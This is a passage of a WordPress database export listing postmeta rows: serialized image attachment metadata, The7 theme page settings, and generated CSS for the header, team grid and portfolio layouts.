(29039,3900,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:643;s:6:\"height\";i:359;s:4:\"file\";s:19:\"2023/03/28m2jpg.jpg\";s:8:\"filesize\";i:79603;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"28m2jpg-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13344;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"28m2jpg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7695;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"28m2jpg-500x279.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28902;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29040,3904,'_edit_lock','1677711783:1'),
(29041,3905,'_wp_attached_file','2023/03/w291.jpg'),
(29042,3905,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:116;s:4:\"file\";s:16:\"2023/03/w291.jpg\";s:8:\"filesize\";i:5386;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29043,3904,'_thumbnail_id','3905'),
(29044,3904,'_edit_last','1'),
(29045,3904,'_dt_sidebar_position','disabled'),
(29046,3904,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29047,3904,'_dt_sidebar_hide_on_mobile','0'),
(29048,3904,'_dt_footer_show','0'),
(29049,3904,'_dt_footer_widgetarea_id','sidebar_2'),
(29050,3904,'_dt_footer_hide_on_mobile','0'),
(29051,3904,'_dt_header_title','fancy'),
(29052,3904,'_dt_header_background','normal'),
(29053,3904,'_dt_header_background_below_slideshow','disabled'),
(29054,3904,'_dt_header_transparent_bg_color_scheme','light'),
(29055,3904,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29056,3904,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29057,3904,'_dt_header_transparent_bg_color','#000000'),
(29058,3904,'_dt_header_transparent_bg_opacity','50'),
(29059,3904,'_dt_header_disabled_background','normal'),
(29060,3904,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29061,3904,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29062,3904,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29063,3904,'_dt_header_disabled_transparent_bg_color','#000000'),
(29064,3904,'_dt_header_disabled_transparent_bg_opacity','50'),
(29065,3904,'_dt_page_overrides_top_margin',''),
(29066,3904,'_dt_page_overrides_right_margin',''),
(29067,3904,'_dt_page_overrides_bottom_margin',''),
(29068,3904,'_dt_page_overrides_left_margin',''),
(29069,3904,'_dt_mobile_page_padding_top',''),
(29070,3904,'_dt_mobile_page_padding_right',''),
(29071,3904,'_dt_mobile_page_padding_bottom',''),
(29072,3904,'_dt_mobile_page_padding_left',''),
(29073,3904,'_dt_teammate_options_go_to_single','1'),
(29074,3904,'_dt_teammate_options_position',''),
(29075,3904,'_dt_teammate_options_website',''),
(29076,3904,'_dt_teammate_options_mail',''),
(29077,3904,'_dt_teammate_options_facebook',''),
(29078,3904,'_dt_teammate_options_twitter',''),
(29079,3904,'_dt_teammate_options_dribbble',''),
(29080,3904,'_dt_teammate_options_you-tube',''),
(29081,3904,'_dt_teammate_options_rss',''),
(29082,3904,'_dt_teammate_options_delicious',''),
(29083,3904,'_dt_teammate_options_flickr',''),
(29084,3904,'_dt_teammate_options_lastfm',''),
(29085,3904,'_dt_teammate_options_linkedin',''),
(29086,3904,'_dt_teammate_options_vimeo',''),
(29087,3904,'_dt_teammate_options_tumbler',''),
(29088,3904,'_dt_teammate_options_pinterest',''),
(29089,3904,'_dt_teammate_options_devian',''),
(29090,3904,'_dt_teammate_options_skype',''),
(29091,3904,'_dt_teammate_options_github',''),
(29092,3904,'_dt_teammate_options_instagram',''),
(29093,3904,'_dt_teammate_options_stumbleupon',''),
(29094,3904,'_dt_teammate_options_behance',''),
(29095,3904,'_dt_teammate_options_px-500',''),
(29096,3904,'_dt_teammate_options_tripedvisor',''),
(29097,3904,'_dt_teammate_options_vk',''),
(29098,3904,'_dt_teammate_options_foursquare',''),
(29099,3904,'_dt_teammate_options_xing',''),
(29100,3904,'_dt_teammate_options_weibo',''),
(29101,3904,'_dt_teammate_options_odnoklassniki',''),
(29102,3904,'_dt_teammate_options_research-gate',''),
(29103,3904,'_dt_teammate_options_yelp',''),
(29104,3904,'_dt_teammate_options_blogger',''),
(29105,3904,'_dt_teammate_options_soundcloud',''),
(29106,3904,'_dt_teammate_options_viber',''),
(29107,3904,'_dt_teammate_options_whatsapp',''),
(29108,3904,'_dt_teammate_options_reddit',''),
(29109,3904,'_dt_teammate_options_snapchat',''),
(29110,3904,'_dt_teammate_options_telegram',''),
(29111,3904,'_dt_fancy_header_layout_heading',''),
(29112,3904,'_dt_fancy_header_title_aligment','center'),
(29113,3904,'_dt_fancy_header_height','300'),
(29114,3904,'_dt_fancy_header_padding-top','0px'),
(29115,3904,'_dt_fancy_header_padding-bottom','0px'),
(29116,3904,'_dt_fancy_header_breadcrumbs_heading',''),
(29117,3904,'_dt_fancy_header_breadcrumbs','disabled'),
(29118,3904,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29119,3904,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29120,3904,'_dt_fancy_header_title_heading',''),
(29121,3904,'_dt_fancy_header_title_mode','generic'),
(29122,3904,'_dt_fancy_header_title',''),
(29123,3904,'_dt_fancy_header_title_font_size','30'),
(29124,3904,'_dt_fancy_header_title_line_height','36'),
(29125,3904,'_dt_fancy_header_text_transform','none'),
(29126,3904,'_dt_fancy_header_title_color_mode','color'),
(29127,3904,'_dt_fancy_header_title_color','#ffffff'),
(29128,3904,'_dt_fancy_header_subtitle_heading',''),
(29129,3904,'_dt_fancy_header_subtitle',''),
(29130,3904,'_dt_fancy_header_subtitle_font_size','18'),
(29131,3904,'_dt_fancy_header_subtitle_line_height','26'),
(29132,3904,'_dt_fancy_header_subtitle_text_transform','none'),
(29133,3904,'_dt_fancy_header_subtitle_color_mode','color'),
(29134,3904,'_dt_fancy_header_subtitle_color','#ffffff'),
(29135,3904,'_dt_fancy_header_bg_heading',''),
(29136,3904,'_dt_fancy_header_bg_color','#222222'),
(29137,3904,'_dt_fancy_header_bg_image_origin','custom'),
(29138,3904,'_dt_fancy_header_bg_image','a:0:{}'),
(29139,3904,'_dt_fancy_header_bg_repeat','no-repeat'),
(29140,3904,'_dt_fancy_header_bg_position_x','center'),
(29141,3904,'_dt_fancy_header_bg_position_y','center'),
(29142,3904,'_dt_fancy_header_bg_fullscreen','1'),
(29143,3904,'_dt_fancy_header_bg_overlay','0'),
(29144,3904,'_dt_fancy_header_overlay_color','#000'),
(29145,3904,'_dt_fancy_header_bg_overlay_opacity','50'),
(29146,3904,'_dt_fancy_header_scroll_effect','default'),
(29147,3904,'_dt_fancy_header_bg_parallax','0.5'),
(29148,3904,'_dt_fancy_header_responsiveness_heading',''),
(29149,3904,'_dt_fancy_header_responsiveness','disabled'),
(29150,3904,'_dt_fancy_header_responsiveness_switch','778px'),
(29151,3904,'_dt_fancy_header_responsive_height','70'),
(29152,3904,'_dt_fancy_header_responsive_font_size','30'),
(29153,3904,'_dt_fancy_header_responsive_title_line_height','38'),
(29154,3904,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29155,3904,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29156,3904,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29157,3904,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29158,3897,'the7_shortcodes_dynamic_css','a:2:{s:32:\"614f02a59ac8c87caaa42b3d87eb0db0\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-614f02a59ac8c87caaa42b3d87eb0db0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width 